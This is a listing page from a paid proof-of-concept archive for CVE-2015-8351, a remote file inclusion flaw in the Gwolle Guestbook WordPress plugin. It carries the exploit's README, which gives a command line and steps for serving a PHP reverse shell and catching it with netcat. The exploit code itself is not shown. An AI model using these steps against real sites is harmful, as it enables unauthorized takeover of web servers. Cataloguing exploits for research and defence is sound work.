Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-8351 PoC — WordPress Gwolle Guestbook插件安全漏洞

Source
Associated Vulnerability
Title:WordPress Gwolle Guestbook插件安全漏洞 (CVE-2015-8351)
Description:PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
Description
this script is exploit for wordpress old plugin gwolle
Readme
# gwolle_buster
this script is exploit for wordpress old plugin gwolle

usage:

./gwolle_buster.py <target_url> <Lhost> <Lport>

first arguments <target_url> => your target url of wordpress that installed gwolle
second arguments <Lhost> => your ip
third arguments <Lport> => listening port for reverse shell 

example: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234

This Script will generate the php reverse shell script and bind the simple server,
so you need open the 2 new terminal and listen the netcat at first terminal, and request with curl commands,
however, commands are auto generate and appear at console,
therefore you can copy and paste easily 
File Snapshot

[4.0K] /data/pocs/db45db92d0b0efdccbb308b7a34eb73bbe78c84c ├── [5.5K] gwolle_buster.py ├── [ 670] README.md └── [2.1K] reverse_shell.php 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →